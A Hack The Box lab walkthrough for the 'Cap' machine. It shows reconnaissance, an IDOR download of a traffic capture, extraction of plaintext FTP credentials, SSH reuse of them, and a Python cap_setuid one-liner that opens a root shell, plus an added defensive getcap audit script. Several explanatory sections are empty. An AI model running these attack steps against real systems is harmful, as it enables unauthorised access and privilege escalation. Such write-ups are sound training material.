🎩 HTB Cap — Solution Notes

Platform: Hack The Box
Machine: Cap
OS: Linux (Ubuntu 20.04)
Difficulty: Easy
Date: March 27, 2026


🗺️ Attack Chain

Nmap → Web recon → IDOR (/data/0) → Download PCAP → FTP credentials → SSH → Linux Capabilities → ROOT


🧠 How Does a Hacker Think? — Before You Begin

When starting a machine, the first question should be: "How many doors are open and which one is the weakest?"

1️⃣ Reconnaissance

Port Scanning

```bash
nmap -p- --min-rate 5000 -sV 10.129.243.146
```

Findings:

Three ports are open: FTP, SSH, and HTTP. HTTP is likely the main entry point. But don't forget FTP — FTP is unencrypted, so if its traffic is captured, the credentials are visible in plain text.

🧠 How Does a Hacker Think? — First Look at a Web Application

When you see a web application, do two things immediately:

2️⃣ Web Application Discovery

The homepage presents a panel called "Security Dashboard." The username Nathan is visible in the top right corner. The menu has several endpoints:

Visiting the /capture endpoint redirects to:

http://10.129.243.146/data/1

💡 What does this mean?

3️⃣ IDOR Vulnerability

💡 What is IDOR (Insecure Direct Object Reference)?

```bash
curl -s http://10.129.243.146/data/0 | grep -i "download"   # Output: /download/0 button found
```

Downloading the PCAP

```bash
curl -s http://10.129.243.146/download/0 -o scan0.pcap
```


🧠 How Does a Hacker Think? — What Are We Looking for in a PCAP?

You have a network traffic capture. So what are you looking for?

4️⃣ PCAP Analysis — Finding Credentials

💡 What is a PCAP?

```bash
tcpdump -r scan0.pcap -A | grep -i "pass\|user\|login\|ftp"
```

Credentials found:

USER: nathan PASS: Buck3tH4TF0RM3!


5️⃣ SSH Login

💡 Why Did the FTP Password Work for SSH Too?

```bash
ssh nathan@10.129.243.146   # Password: Buck3tH4TF0RM3!
```


🚩 User Flag

```bash
cat ~/user.txt
```


🧠 How Does a Hacker Think? — How Do We Get to Root?

You're in as nathan. Now think systematically about getting to root:

6️⃣ Privilege Escalation — Linux Capabilities

💡 What are Linux Capabilities?

Scan for Capabilities on the System

💡 The getcap Command

```bash
getcap -r / 2>/dev/null
```

Output:

```
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip   ← DANGEROUS!
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
```

/usr/bin/python3.8 has cap_setuid. If we call os.setuid(0) in Python, we set our UID to 0 (root). Then os.system("/bin/bash") opens a root shell.
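Added example (not part of the write-up): a small Python audit that does, in code, what the getcap check above does by eye. It parses getcap -r output in the layout shown, flags binaries whose permitted or effective set holds a capability that on its own lets a local user escalate, and emits the setcap -r commands that strip those capabilities; the listing from this box is embedded as a constructed sample, and the DANGEROUS_CAPS set is my own selection.

```python
import re
from typing import Dict, List, Tuple

# Capabilities that, on a binary any local user can run, are enough on their own
# to escalate; a hand-picked set for this audit (cap_setuid is the one on this box).
DANGEROUS_CAPS = frozenset({
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
})

# Accepts the older "path = caps+eip" layout shown above and the newer libcap "path caps=eip".
LINE_RE = re.compile(r"^(?P<path>\S+)(?:\s*=\s*|\s+)(?P<caps>[\w,]+)[+=](?P<flags>[eip]+)$")

def parse_getcap(output: str) -> List[Tuple[str, frozenset, str]]:
    """Parse `getcap -r / 2>/dev/null` text into (path, capability set, flags) tuples."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised getcap line: {line!r}")
        caps = frozenset(c.lower() for c in m.group("caps").split(","))
        entries.append((m.group("path"), caps, m.group("flags")))
    return entries

def audit(output: str) -> Dict[str, List[str]]:
    """Map each binary to its dangerous capabilities, counting only those that are
    permitted (p) or effective (e); inheritable-only (i) is not usable by the binary."""
    findings: Dict[str, List[str]] = {}
    for path, caps, flags in parse_getcap(output):
        bad = sorted(caps & DANGEROUS_CAPS)
        if bad and ("p" in flags or "e" in flags):
            findings[path] = bad
    return findings

def remediation(findings: Dict[str, List[str]]) -> List[str]:
    """`setcap -r` removes all file capabilities from a flagged binary."""
    return [f"setcap -r {path}" for path in sorted(findings)]

# Constructed sample: the getcap listing from this write-up.
SAMPLE_OUTPUT = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
"""
```

Calling `audit(SAMPLE_OUTPUT)` returns `{'/usr/bin/python3.8': ['cap_setuid']}`; the ping and traceroute entries carry only cap_net_raw and are not flagged.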

Root Shell

```bash
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

```bash
id   # uid=0(root) gid=1000(nathan) groups=1000(nathan)
```

uid=0(root) — We're root! Even though gid still shows nathan, uid=0 means we have full root privileges.

🚩 Root Flag

```bash
cat /root/root.txt
```


📚 Concepts Learned


🔑 General Hacker Mindset Summary

  1. Question every number in a URL: If there's an ID, there might be IDOR — change it and test.
  2. Watch for unencrypted protocols: FTP, HTTP, or Telnet traffic may expose credentials in plain text.
  3. Password reuse is real: When you find a password, try it everywhere.
  4. Capabilities can be dangerous: Run getcap, and if you see cap_setuid — exploit it immediately.
  5. Systematic privesc: sudo → SUID → capabilities → cron → writable files — follow the order.